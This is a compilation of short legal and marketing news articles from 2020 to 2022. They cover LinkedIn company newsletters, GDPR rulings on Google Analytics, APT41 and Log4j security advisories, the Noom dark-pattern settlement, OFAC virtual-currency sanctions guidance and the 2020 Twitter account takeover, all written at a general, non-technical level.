How Businesses Can Use LinkedIn Company Newsletters in Their Marketing Efforts

LinkedIn has added what I think is the most helpful tool in a long time for businesses to engage with and bring value to their followers – the ability for LinkedIn Company Pages to publish email newsletters right through LinkedIn.

This underscores the importance of having a company page and how it can be used as a content hub for marketing and recruiting your business.

Linked Company Page newsletters are available to businesses with more than 150 followers that actively maintain their LinkedIn presences.

You can create a LinkedIn Company Page newsletter in three simple steps:

  1. Create: Start writing an article on and select “Create a Newsletter.” Give it a title, add a header image (it prompts you with the dimensions) and cut and paste your text. You can add hyperlinks and images for each article too.
  2. Publish: When you publish your newsletter it will post to your feed and LinkedIn will notify your followers. They can opt in to receive email and in-platform notifications when you publish new content.
  3. Review performance: View the analytics of each newsletter sent out and see the number of subscribers. The number increases pretty quickly which is awesome. And it’s opt in so you don’t have to worry about GDPR rules.

There’s a lot of opportunity here because it is a new feature (for companies – it’s been available to individuals for a short time) and most companies don’t know about it yet (and certainly aren’t using it yet), so being an early adopter is to your benefit.

Even if you send out an email newsletter, you should still utilize the LinkedIn platform to send out a newsletter because you will reach a different audience and cast a wider net for your content.

In addition, people are opting into this newsletter, so it’s not building an audience from scratch, and if you haven’t ever sent out an email newsletter, this is a great way to start. If email marketing programs and CRM management tools overwhelm you, this is a great way to test out the waters.

It’s also really easy to repurpose content you already have. I would include hyperlinks to your website or blog with the full text (in order to keep the newsletter short and to drive traffic to your site).

You can embed links from YouTube into the newsletter to play. Check out my LinkedIn newsletter to see how it looks.

Here are some content ideas for what you can include in your LinkedIn Company Page Newsletter:

  • Article snippets with links to your latest blog posts or client alerts
  • Links to past webinars (provide a synopsis too)
  • Links to recent podcasts and videos (with shownotes)
  • Recent case studies
  • Q&As with your employees
  • Highlights of your community service/pro bono work
  • Announcements of your recent hires
  • Recent press coverage (this would be the only place where I would recommend including self-promotional items in the newsletter – the rest of it should be client-focused)
  • Upcoming events/webinars – this is a great way to promote them
  • Open jobs – why not promote them through this newsletter? It’s a competitive job market
  • News about your diversity and women’s initiatives programs – clients care a lot about this

Check out this new feature and let me know what you think of it. With nearly 800 million people on LinkedIn and the fact that your competitors are very likely not using it yet, it’s at least worth trying out.

Copyright © 2022, Stefanie M. Marrone. All Rights Reserved.

Google to Launch Google Analytics 4 in an Attempt to Address EU Privacy Concerns

On March 16, 2022, Google announced the launch of its new analytics solution, “Google Analytics 4.” Google Analytics 4 aims, among other things, to address recent developments in the EU regarding the use of analytics cookies and data transfers resulting from such use.

Background

On August 17, 2020, the non-governmental organization None of Your Business (“NOYB”) filed 101 identical complaints with 30 European Economic Area data protection authorities (“DPAs”) regarding the use of Google Analytics by various companies. The complaints focused on whether the transfer of EU personal data to Google in the U.S. through the use of cookies is permitted under the EU General Data Protection Regulation (“GDPR”), following the Schrems II judgment of the Court of Justice of the European Union. Following these complaints, the French and Austrian DPAs ruled that the transfer of EU personal data from the EU to the U.S. through the use of the Google Analytics cookie is unlawful.

Google’s New Solution

According to Google’s press release, Google Analytics 4 “is designed with privacy at its core to provide a better experience for both our customers and their users. It helps businesses meet evolving needs and user expectations, with more comprehensive and granular controls for data collection and usage.”

The most impactful change from an EU privacy standpoint is that Google Analytics 4 will no longer store IP address, thereby limiting the data transfers resulting from the use of Google Analytics that were under scrutiny in the EU following the Schrems II ruling. It remains to be seen whether this change will ease EU DPAs’ concerns about Google Analytics’ compliance with the GDPR.

Google’s previous analytics solution, Universal Analytics, will no longer be available beginning July 2023. In the meantime, companies are encouraged to transition to Google Analytics 4.

Read Google’s press release.

Copyright © 2022, Hunton Andrews Kurth LLP. All Rights Reserved.

Chinese APT41 Attacking State Networks

Although we are receiving frequent alerts from CISA and the FBI about the potential for increased cyber threats coming out of Russia, China continues its cyber threat activity through APT41, which has been linked to China’s Ministry of State Security. According to Mandiant, APT41 has launched a “deliberate campaign targeting U.S. state governments” and has successfully attacked at least six state government networks by exploiting various vulnerabilities, including Log4j.

According to Mandiant, although the Chinese-based hackers are kicked out of state government networks, they repeat the attack weeks later and keep trying to get in to the same networks via different vulnerabilities (a “re-compromise”). One such successful vulnerability that was utilized is the USAHerds zero-day vulnerability, which is a software that state agriculture agencies use to monitor livestock. When the intruders are successful in using the USAHerds vulnerability to get in to the network, they can then leverage the intrusion to migrate to other parts of the network to access and steal information, including personal information.

Mandiant’s outlook on these attacks is sobering:

“APT41’s recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques. APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use. APT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting U.S state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain unchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.

Both Russia and China continue to conduct cyber-attacks against both private and public networks in the U.S. and there is no indication that the attacks will subside anytime soon.

Copyright © 2022 Robinson & Cole LLP. All rights reserved.

GDPR Privacy Rules: The Other Shoe Drops

Four years after GDPR was implemented, we are seeing the pillars of the internet business destroyed. Given two new EU decisions affecting the practical management of data, all companies collecting consumer data in the EU are re-evaluating their business models and will soon be considering wholesale changes.

On one hand, the GDPR is creating the world its drafters intended – a world where personal data is less of a commodity exploited and traded by business. On the other hand, GDPR enforcement has taken the form of a wrecking ball, leading to data localization in Europe and substitution of government meddling for consumer choice.

For years we have watched the EU courts and enforcement agencies apply GDPR text to real-life cases, wondering if the legal application would be more of a nip and tuck operation on ecommerce or something more bloody and brutal. In 2022, we received our answer, and the bodies are dropping.

In January Austrian courts decided that companies can’t use Google Analytics to study their own site’s web traffic. The same conclusion was reached last week by French regulators. While Google doesn’t announce statistics about product usage, website tracker BuiltWith published that 29.3 million websites use Google Analytics, including 69.5 percent of Quantcast’s Top 10,000 sites, and that is more than ten times the next most popular option. So vast numbers of companies operating in Europe will need to change their platform analytics provider – if the Euro-crats will allow them to use site analytics at all.

But these decisions were not based on the functionality of Google Analytics, a tool that does not even capture personally identifiable information – no names, no home or office address, no phone numbers. Instead, these decisions that will harm thousands of businesses were a result of the Schrems II decision, finding fault in the transfer of this non-identifiable data to a company based in the United States. The problem here for European decision-makers is that US law enforcement may have access to this data if courts allow them. I have written before about this illogical conclusion and won’t restate the many arguments here, other than to say that EU law enforcement behaves the same way.

The effects of this decision will be felt far beyond the huge customer base of Google Analytics.  The logic of this decision effectively means that companies collecting data from EU citizens can no longer use US-based cloud services like Amazon Web Services, IBM, Google, Oracle or Microsoft. I would anticipate that huge cloud player Alibaba Cloud could suffer the same proscription if Europe’s privacy panjandrums decide that China’s privacy protection is as threatening as the US.

The Austrians held that all the sophisticated measures taken by Google to encrypt analytic data meant nothing, because if Google could decrypt it, so could the US government. By this logic, no US cloud provider – the world’s primary business data support network – could “safely” hold EU data. Which means that the Euro-crats are preparing to fine any EU company that uses a US cloud provider. Max Schrems saw this decision in stark terms, stating, “The bottom line is: Companies can’t use US cloud services in Europe anymore.”

This decision will ultimately support the Euro-crats’ goal of data localization as companies try to organize local storage/processing solutions to avoid fines. Readers of this blog have seen coverage of the EU’s tilt toward data localization (for example, here and here) and away from the open internet that European politicians once held as the ideal. The Euro-crats are taking serious steps toward forcing localized data processing and cutting US businesses out of the ecommerce business ecosystem. The Google Analytics decision is likely to be seen as a tipping point in years to come.

In a second major practical online privacy decision, earlier this month the Belgian Data Protection Authority ruled that the Interactive Advertising Bureau Europe’s Transparency and Consent Framework (TCF), a widely-used technical standard built for publishers, advertisers, and technology vendors to obtain user consent for data processing, does not comply with the GDPR. The TCF allows users to accept or reject cookie-based advertising, relieving websites of the need to create their own expensive technical solutions, and creating a consistent experience for consumers. Now the TCF is considered per-se illegal under EU privacy rules, casting thousands of businesses to search for or design their own alternatives, and removing online choices for European residents.

The Belgian privacy authority reached this conclusion by holding that the Interactive Advertising Bureau was a “controller” of all the data managed under its proposed framework. As stated by the Center for Data Innovation, this decision implies “that any good-faith effort to implement a common data protection protocol by an umbrella organization that wants to uphold GDPR makes said organization liable for the data processing that takes place under this protocol.” No industry group will want to put itself in this position, leaving businesses to their own devices and making ecommerce data collection much less consistent and much more expensive – even if that data collection is necessary to fulfill the requests of consumers.

For years companies thought that informed consumer consent would be a way to personalize messaging and keep consumer costs low online, but the EU has thrown all online consent regimes into question. EU regulators have effectively decided that people can’t make their own decisions about allowing data to be collected. If TCF – the consent system used by 80% of the European internet and a system designed specifically to meet the demands of the GDPR – is now illegal, then, for a second time in a month, all online consumer commerce is thrown into confusion. Thousands were operating websites with TCF and Google Analytics, believing they were following the letter of the law.  That confidence has been smashed.

We are finally seeing the practical effects of the GDPR beyond its simple utility for fining US tech companies.  Those effects are leading to a closed-border internet around Europe and a costlier, less customizable internet for EU citizens. The EU is clearly harming businesses around the world and making its internet a more cramped place. I have trouble seeing the logic and benefit of these decisions, but the GDPR was written to shake the system, and privacy benefits may emerge.

Copyright © 2022 Womble Bond Dickinson (US) LLP All Rights Reserved.
For more articles about international privacy, visit the NLR Cybersecurity, Media & FCC section.

Fitness App Agrees to Pay $56 Million to Settle Class Action Alleging Dark Pattern Practices

On February 14, 2022, Noom Inc., a popular weight loss and fitness app, agreed to pay $56 million, and provide an additional $6 million in subscription credits to settle a putative class action in New York federal court. The class is seeking conditional certification and has urged the court to preliminarily approve the settlement.

The suit was filed in May 2020 when a group of Noom users alleged that Noom “actively misrepresents and/or fails to accurately disclose the true characteristics of its trial period, its automatic enrollment policy, and the actual steps customer need to follow in attempting to cancel a 14-day trial and avoid automatic enrollment.” More specifically, users alleged that Noom engaged in an unlawful auto-renewal subscription business model by luring customers in with the opportunity to “try” its programs, then imposing significant barriers to the cancellation process (e.g., only allowing customers to cancel their subscriptions through their virtual coach), resulting in the customers paying a nonrefundable advance lump-sum payment for up to eight (8) months at a time. According to the proposed settlement, Noom will have to substantially enhance its auto-renewal disclosures, as well as require customers to take a separate action (e.g., check box or digital signature) to accept auto-renewal, and provide customers a button on the customer’s account page for easier cancellation.

Regulators at the federal and state level have recently made clear their focus on enforcement actions against “dark patterns.” We previously summarized the FTC’s enforcement policy statement from October 2021 warning companies against using dark patterns that trick consumers into subscription services. More recently, several state attorneys general (e.g., in Indiana, Texas, the District of Columbia, and Washington State) made announcements regarding their commitment to ramp up enforcement work on “dark patterns” that are used to ascertain consumers’ location data.

Article By: Privacy and Cybersecurity Practice Group at Hunton Andrews Kurth

Copyright © 2022, Hunton Andrews Kurth LLP. All Rights Reserved.

New Poll Underscores Growing Support for National Data Privacy Legislation

Over half of all Americans would support a federal data privacy law, according to a recent poll from Politico and Morning Consult. The poll found that 56 percent of registered voters would either strongly or somewhat support a proposal to “make it illegal for social media companies to use personal data to recommend content via algorithms.” Democrats were most likely to support the proposal at 62 percent, compared to 54 percent of Republicans and 50 percent of Independents. Still, the numbers may show that bipartisan action is possible.

The poll is indicative of American’s increasing data privacy awareness and concerns. Colorado, Virginia, and California all passed or updated data privacy laws within the last year, and nearly every state is considering similar legislation. Additionally, Congress held several high-profile hearings last year soliciting testimony from several tech industry leaders and whistleblower Frances Haugen. In the private sector, Meta CEO Mark Zuckerberg has come out in favor of a national data privacy standard similar to the EU’s General Data Protection Regulation (GDPR).

Politico and Morning Consult released the poll results days after Senator Ron Wyden (D-OR) accepted a 24,000-signature petition calling for Congress to pass a federal data protection law. Senator Wyden, who recently introduced his own data privacy proposal called the “Mind Your Own Business Act,” said it was “past time” for Congress to act.

He may be right: U.S./EU data flows have been on borrowed time since 2020. The GDPR prohibits data flows from the EU to countries with inadequate data protection laws, including the United States. The U.S. Privacy Shield regulations allowed the United States to circumvent the rule, but an EU court invalidated the agreement in 2020, and data flows between the US and the EU have been in legal limbo ever since. Eventually, Congress and the EU will need to address the situation and a federal data protection law would be a long-term solution.

This post was authored by C. Blair Robinson, legal intern at Robinson+Cole. Blair is not yet admitted to practice law. Click here to read more about the Data Privacy and Cybersecurity practice at Robinson & Cole LLP.

For more data privacy and cybersecurity news, click here to visit the National Law Review.

Copyright © 2022 Robinson & Cole LLP. All rights reserved.

New Tools in the Fight Against Counterfeit Pharmaceuticals

The explosive growth of internet pharmacies and direct-to-consumer shipment of pharmaceuticals has provided increased access to, and reduced the cost of, important medications. Unfortunately, these same forces have increased the risks that counterfeit medicines will make their way to consumers, endangering patient safety and affecting manufacturers’ reputation in the public eye.

While the Food and Drug Administration attempts to police such misconduct through enforcement of the Food, Drug, and Cosmetics Act (FDCA), the resources devoted to enforcement are simply no match for the size and scope of the counterfeiting threat. Fortunately, pharmaceutical manufacturers are not without recourse, as several well-established tools may be used in the right circumstances to stop counterfeiters from profiting from the sale of knock-offs.

Experienced litigators can use the Lanham Act and the Racketeer Influenced Corrupt Organizations (RICO) Act to stop unscrupulous individuals and organizations from deceiving customers with counterfeit versions of trademarked drugs. Until recently, these legal weapons – including search warrants, seizures, forfeitures, and significant penalties – were typically wielded only by the government and only in criminal prosecutions.

As one recent case demonstrates, however, many of the tools that law enforcement has used for years to combat counterfeiters are also available to pharmaceutical manufacturers. In Gilead Sciences, Inc. v. Safe Chain Solutions, LLC, et al., the manufacturer of several trademarked HIV medications filed a civil complaint, under seal, alleging violations of the Lanham Act and RICO against scores of individuals and companies that were allegedly selling counterfeit versions of these drugs to patients across the country.

By deploying private investigators and techniques typically used by law enforcement, Gilead was able to gather a substantial amount of evidence before even filing the case. The company then used this evidence to secure ex parte seizure warrants and asset freezes, allowing it to locate and seize thousands of counterfeit pills and packaging before they could be shipped to unsuspecting consumers. Through the seizure of the financial proceeds of the alleged counterfeiting, Gilead prevented the dissipation of assets. If the company can successfully prove its RICO case, it stands to recover treble damages and attorneys’ fees as well.

Manufacturers of trademarked pharmaceuticals may consider using these and other tools to tackle the threat posed by counterfeiters. By drawing upon the experience and skills of trained litigators – particularly counsel who previously deployed these tools on behalf of the government while serving as federal prosecutors – companies can proactively protect their intellectual property and the consumers who depend on their products.

© 2022 BARNES & THORNBURG LLP

Patch Up – Log4j and How to Avoid a Cybercrime Christmas

A vulnerability so dangerous that Cybersecurity and Infrastructure (CISA) Director Jen Easterly called it “one of the most serious [she’s] seen in [her] entire career, if not the most serious” arrived just in time for the holidays. On December 10, 2021, CISA and the director of cybersecurity at the National Security Agency (NSA) began alerting the public of a critical vulnerability within the Apache Log4j Java logging framework. Civilian government agencies have been instructed to mitigate against the vulnerability by Christmas Eve, and companies should follow suit.

The Log4j vulnerability allows threat actors to remotely execute code both on-premises and within cloud-based application servers, thereby obtaining control of the impacted servers. CISA expects the vulnerability to affect hundreds of millions of devices. This is a widespread critical vulnerability and companies should quickly assess whether, and to what extent, they or their service providers are using Log4j.

Immediate Recommendations

  • Immediately upgrade all versions of Apache Log4j to 2.15.0.
  • Ask your service providers whether their products or environment use Log4j, and if so, whether they have patched to the latest version. Helpfully, CISA sponsors a community-sourced GitHub repository with a list of software related to the vulnerability as a reference guide.
  • Confirm your security operations are monitoring internet-facing systems for indicators of compromise.
  • Review your incident response plan and ensure all response team information is up to date.
  • If your company is involved in an acquisition, discuss the security steps taken within the target company to address the Log4j vulnerability.

The versatility of this vulnerability has already attracted the attention of malicious nation-state actors. For example, government-affiliated cybercriminals in Iran and China have a “wish list” (no holiday pun intended) of entities that they are aggressively targeting with the Log4j vulnerability. Due to this malicious nation-state activity, if your company experiences a ransomware attack related to the Log4j vulnerability, it is particularly important to pay attention to potential sanctions-related issues.

Companies with additional questions about the Log4j vulnerability and its potential impact on technical threats and potential regulatory scrutiny or commercial liability are encouraged to contact counsel.

© 2021 Bracewell LLP

OFAC Reaffirms Focus on Virtual Currency With Updated Sanctions Law Guidance

On October 15, 2021, the US Department of the Treasury’s Office of Foreign Asset Control (OFAC) announced updated guidance for virtual currency companies in meeting their obligations under US sanctions laws. On the same day, OFAC also issued guidance clarifying various cryptocurrency-related definitions.

Coming on the heels of the Anti-Money Laundering Act of 2020—and in the context of the Biden administration’s effort to crackdown on ransomware attacks—the recent guidance is the latest indication that regulators are increasingly focusing on virtual currency and blockchain. In light of these developments, virtual currency market participants and service providers should ensure they are meeting their respective sanctions obligations by employing a “risk-based” anti-money laundering and sanctions compliance program.

This update highlights the government’s continued movement toward subjecting the virtual currency industry to the same requirements, scrutiny and consequences in cases of noncompliance as applicable to traditional financial institutions.

IN DEPTH

The release of OFAC’s Sanctions Compliance Guidance for the Virtual Currency Industry indicates an increasing expectation for diligence as it has now made clear on several occasions that sanctions compliance “obligations are the same” for virtual currency companies who must employ an unspecified “risk-based” program (See: OFAC Consolidated Frequently asked Questions 560). OFAC published it with the stated goal of “help[ing] the virtual currency industry prevent exploitation by sanctioned persons and other illicit actors.”

With this release, OFAC also provided some answers and updates to two of its published sets of “Frequently Asked Questions.”

FAQ UPDATES (FAQ 559 AND 546)

All are required to comply with the US sanctions compliance program, including persons and entities in the virtual currency and blockchain community. OFAC has said time and again that a “risk-based” program is required but that “there is no single compliance program or solution suitable for all circumstances” (See: FAQ 560). While market participants and service providers in the virtual currency industry must all comply, the risk of violating US sanctions are most acute for certain key service providers, such as cryptocurrency exchanges and over-the-counter (OTC) desks that facilitate large volumes of virtual currency transactions.

OFAC previously used the term “digital currency” when it issued its first FAQ and guidance on the subject (FAQ 560), which stated that sanctions compliance is applicable to “digital currency” and that OFAC “may include as identifiers on the [Specially Designated Nationals and Blocked Persons] SDN List specific digital currency addresses associated with blocked persons.” Subsequently, OFAC placed certain digital currency addresses on the SDN List as identifiers.

While OFAC previously used the term “digital currency,” in more recent FAQs and guidance, it has used a combination of the terms “digital currency” and “virtual currency” without defining those terms until it released FAQ 559.

In FAQ 559, OFAC defines “virtual currency” as “a digital representation of value that functions as (i) a medium of exchange; (ii) a unit of account; and/or (iii) a store of value; and is neither issued nor granted by any jurisdiction.” This is a broad definition but likely encompasses most assets, which are commonly referred to as “cryptocurrency” or “tokens,” as most of these assets may be considered as “mediums of exchange.”

OFAC also defines “digital currency” as “sovereign cryptocurrency, virtual currency (non-fiat), and a digital representation of fiat currency.” This definition appears to be an obvious effort by OFAC to make clear that its definitions include virtual currencies issued or backed by foreign governments and stablecoins.

The reference to “sovereign cryptocurrency” is focused on cryptocurrency issued by foreign governments, such as Venezuela. This is not the first time OFAC has focused on sovereign cryptocurrency. It ascribed the use of sovereign backed cryptocurrencies as a high-risk vector for US sanctions circumvention. Executive Order (EO) 13827, which was issued on March 19, 2018, explicitly stated:

In light of recent actions taken by the Maduro regime to attempt to circumvent U.S. sanctions by issuing a digital currency in a process that Venezuela’s democratically elected National Assembly has denounced as unlawful, hereby order as follows: Section 1. (a) All transactions related to, provision of financing for, and other dealings in, by a United States person or within the United States, and digital currency, digital coin, or digital token, that was issued by, for, or on behalf of the Government of Venezuela on or after January 9, 2018, are prohibited as of the effective date of this order.

On March 19, 2018, OFAC issued FAQs 564, 565 and 566, which were specifically focused on Venezuela issued cryptocurrencies, stating that “petro” and “petro gold” are considered a “digital currency, digital coin, or digital token” subject to EO 13827. While OFAC has not issued specific FAQs or guidance on other sovereign backed cryptocurrencies, it may be concerned that a series of countries have stated publicly that they plan to test and launch sovereign backed securities, including Russia, Iran, China, Japan, England, Sweden, Australia, the Netherlands, Singapore and India. With the release if its most recent FAQs, OFAC is reaffirming that it views sovereign cryptocurrencies as highly risky and well within the scope of US sanctions programs.

The reference to a “digital representation of fiat currency” appears to be a reference to “stablecoins.” In theory, stablecoins are each worth a specified value in fiat currency (usually one USD each). Most stablecoins were touted as being completely backed by fiat currency stored in segregated bank accounts. The viability and safety of stablecoins, however, has recently been called into question. One of the biggest players in the stablecoin industry is Tether, who was recently fined $41 million by the US Commodities Futures Trading Commission for failing to have the appropriate fiat reserves backing its highly popular stablecoin US Dollar Token (USDT). OFAC appears to have taken notice and states in its FAQ that “digital representations of fiat currency” are covered by its regulations and FAQs.

FAQ 646 provides some guidance on how cryptocurrency exchanges and other service providers should implement a “block” on virtual currency. Any US persons (or persons subject to US jurisdiction), including financial institutions, are required under US sanctions programs to “block” assets, which requires freezing assets and notifying OFAC within 10 days. (See: 31 C.F.R. § 501.603 (b)(1)(i).) FAQ 646 makes clear that “blocking” obligations applies to virtual currency and also indicates that OFAC expects cryptocurrency exchanges and other service providers be required to “block” the virtual currency at issue and freeze all other virtual currency wallets “in which a blocked person has an interest.”

Depending on the strength of the anti-money laundering/know-your-customer (AML/KYC) policies employed, it will likely prove difficult for cryptocurrency exchanges and other service providers to be sure that they have identified all associated virtual currency wallets in which a “blocked person has an interest.” It is possible that a cryptocurrency exchange could onboard a customer who complied with an appropriate risk-based AML/KYC policy and, unbeknownst to the cryptocurrency exchange, a blocked person “has an interest” in one of the virtual currency wallets. It remains to be seen how OFAC will employ this “has an interest” standard and whether it will take any cryptocurrency exchanges or other service providers to task for not blocking virtual currency wallets in which a blocked person “has an interest.” It is important for cryptocurrency exchanges or other service providers to implement an appropriate risk-based AML/KYC policy to defend any inquiries from OFAC as to whether it has complied with the various US sanctions programs, including by having the ability to identify other virtual currency wallets in which a blocked person “has an interest.”

UPDATED SANCTIONS COMPLIANCE GUIDANCE

OFAC’s recent framework for OFAC Compliance Commitments outlines five essential components for a virtual currency operator’s sanctions compliance program. These components generally track those applicable to more traditional financial institutions and include:

  1. Senior management should ensure that adequate resources are devoted to the support of compliance, that a competent sanctions compliance officer is appointed and that adequate independence is granted to the compliance unit to carry out their role.
  2. An operative risk assessment should be fashioned to reflect the unique exposure of the company. OFAC maintains both a public use sanctions list and a free search tool for that list which should be employed to identify and prevent sanctioned individuals and entities from accessing the company’s services.
  3. Internal controls must be put in place that address the unique risks recognized by the company’s risk assessment. OFAC does not have a specific software or hardware requirement regarding internal controls.
    1. Although OFAC does not specify required internal controls, it does provide recommended best practices. These include geolocation tools with IP address blocking controls, KYC procedures for both individuals and entities, transaction monitoring and investigation software that can review historically identified bad actors, the implementation of remedial measures upon internal discovery of weakness in sanction compliance, sanction screening and establishing risk indicators or red flags that require additional scrutiny when triggered.
    2. Additionally, information should be obtained upon the formation of each new customer relationship. A formal due diligence plan should be in place and operated sufficiently to alert the service provider to possible sanctions-related alarms. Customer data should be maintained and updated through the lifecycle of that customer relationship.
  4. To ensure an entity’s sanctions compliance program is effective and efficient, that entity should regularly test their compliance against independent objective testing and auditing functions.
  5. Proper training must be provided to a company’s workforce. For a company’s sanctions compliance program to be effective, its workforce must be properly outfitted with the hard and soft skills required to execute its compliance program. Although training programs may vary, OFAC training should be provided annually for all employees.

KEY TAKEAWAYS

As noted in OFAC’s press release issued simultaneously with the updated FAQ’s, “[t]hese actions are a part of the Biden Administration’s focused, integrated effort to counter the ransomware threat.” The Biden administration’s increased focus on regulatory and enforcement action in the virtual currency space highlights the importance for market participants and service providers to implement a robust compliance program. Cryptocurrency exchanges and other service providers must take special care in drafting and implementing their respective AML/KYC policies and in ensuring the existence of risk-based AML and sanctions compliance programs, which includes a periodic training program. When responding to inquiries from OFAC or other regulators, it will be critical to have documented evidence of the implementation of a risk-based AML/KYC program and proof that employees have been appropriately trained on all applicable policies, including a sanctions compliance policy.

Ethan Heller, a law clerk in the firm’s New York office, also contributed to this article.

© 2021 McDermott Will & Emery
For the latest in Financial, Securities, and Banking legal news, read more at the National Law Review.

Thieves Breach Twitter Security to Commandeer Famous Accounts

The Twitter accounts of major companies and individuals were briefly taken over as part of a bitcoin scam. Former and current heads of states, global corporations, and presidential candidates had their twitter accounts compromised. The tweet from many of the twitter account said similar things, for example Kanye West’s feed stated that he is “giving back to my fans”; the message from Bezos’, Barack Obama, and Joe Biden’s account said that they had “decided to give back to my community”; while Elon Musk’s account said “feeling greatful” and provided a link to a Bitcoin wallet to send money to. The tweets would indicate that they would send double the money back to a limited number of contributors.

Twitter, through its Twitter Support account notified users that an internal investigation was conducted into the matter. The investigation revealed that several employees who had access to internal systems had their accounts compromised in a “coordinated social engineering attack.” Twitter’s internal system was then exploited to tweet from high-profile accounts. The attack was at least moderately successful considering the Bitcoin wallets promoted in the tweets received over 300 transactions and Bitcoin worth over $100,000.

These tweets began at about 4 P.M. (Eastern Standard Time) on Wednesday, July 16. The first wave of attacks hit the Twitter accounts of prominent cryptocurrency leaders and companies, but expanded quickly after that. Along with Vice President Biden, President Obama, Kanye West, Bill Gates, Michael Bloomberg, and Elon Musk, large company accounts were also targeted including Uber and Apple. Twitter’s initial response was to take down the offending tweets, but those were quickly replaced by new ones – – an indication that the hackers maintained access to the individual accounts.

The persistence of the attacks led to Twitter disabling some the platform services including the ability of blue-checked (verified) twitter users to tweet. The services were restored around four and a half hours after the suspicious tweets began. However, that shutdown period was not insignificant. Several National Weather Service Twitter accounts were shut down as a line of severe weather and possible tornadoes moved across the Midwest. The National Weather Service felt severely hampered in its ability to communicate with people about the impending storm.

In a tweet, Twitter’s CEO Jack Dorsey said that the company feels  “terrible this happened” and that they are “diagnosing and will share everything we can when we have a more complete understanding of exactly what happened.” The nature of this attack is yet to be determined. The legal implications will hinge on the findings of the investigation, including whether there were sensitive direct messages accessed by the attackers. Considering the compromised accounts includes current and former heads of state (Prime Minister Benjamin Netanyahu, President Obama, and Vice President Biden), there are also questions of national security involved.

The United States does not have a comprehensive federal data breach notification scheme. These obligations are provided by the fifty states and sector-specific laws. More than 40 of the state breach notification laws contain a harm threshold pursuant to which notification is not required unless harm to affected individuals has occurred or is reasonably likely to occur. The EU’s GDPR also includes a similar assessment. As more information is disclosed, we will get a better understanding of Twitter and the attacked users’ incident response processes.


Copyright © 2020 Womble Bond Dickinson (US) LLP All Rights Reserved.